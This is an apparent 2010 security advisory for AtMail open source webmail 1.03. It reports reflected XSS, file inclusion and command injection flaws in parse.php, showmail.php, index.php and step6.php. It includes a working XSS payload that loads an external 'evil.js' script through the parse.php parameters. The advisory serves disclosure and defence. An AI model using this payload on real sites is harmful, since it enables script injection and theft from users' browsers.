AtMail Open Source Webmail Client version 1.03 suffers from code execution, cross site scripting and local file inclusion vulnerabilities.
ba6b36de24e066160709a48e4b9cd6d5ae522e956a8646e9bb9728696fd19080
+===========================================================================================+
+ AtMail Open source webmail client 1.03 & XSS & Remote Execution Code +
+===========================================================================================+
Author(s): Ivan Sanchez
Product: AtMail open source webmail client 1.03
Web: http://atmail.com/ http://atmail.org/
Versions: 1.03 (last version)
Date: 20/06/2010
Vendor: Informed trough web form 19-06-2010
Information:
http://atmail.com/contact.php
atMail proudly serves various organizations, including leading ISPs, Portals, small to medium business
and prestigious educational and government clients. The AtMail software powers over 10 million email accounts worldwide,
used by people on a daily basis for their critical email communication. We serve over 4,000 paying customers from around 70 countries,
to deliver one of the best integrated Webmail and Email-server solutions on the market.
GOOGLE DORKS:
------------
n/a
Evil Function:
--------------
PARSE.PHP
http://demo.atmail.org/parse.php?file=html/LANG/simple/showmail_interface.html&ajax=1&func=
http://demo.atmail.org/parse.php?file=
Internal Variables without Controls:
------------------------------------
FILE
FUNC
Exploiting:
--------------
Insert and assign the evil code to these variables,then import the malicious java as you want!
I have replaced some URL's to avoid something ;-)
EVIL CODE= "><script src=http://site/evil.js></script>
http://demo.atmail.org/parse.php?file=html/LANG/simple/showmail_interface.html&ajax=1&func= EVIL CODE
http://demo.atmail.org/parse.php?file= EVIL CODE
More files affected with differents types of holes:
---------------------------------------------------
Reflected XSS:
--------------
Line 412 of showmail.php sends unvalidated data to a web browser, which can result in the browser executing malicious code.
Line 189 of showmail.php sends unvalidated data to a web browser, which can result in the browser executing malicious code.
Line 844 of showmail.php sends unvalidated data to a web browser, which can result in the browser executing malicious code.
File Inclusion:
---------------
The file index.php passes an unvalidated filename to a dynamic include statement on line 131. Allowing unvalidated user input to to control files that are included dynamically in PHP can lead to malicious code execution.
Command Injection:
-------------------
Line 47 in step6.php calls shell_exec() with a command built from untrusted data. This call can cause the program to execute malicious commands on behalf of an attacker.
To conclude, I could find a lot of issues regarding SLQ Injection, and other dangerous holes.
NULL CODE SERVICES [ www.nullcode.com.ar ] Hunting Security Bugs!
+===========================================================================================+
+ AtMail Open source webmail client 1.03 & XSS & Remote Execution Code +
+===========================================================================================+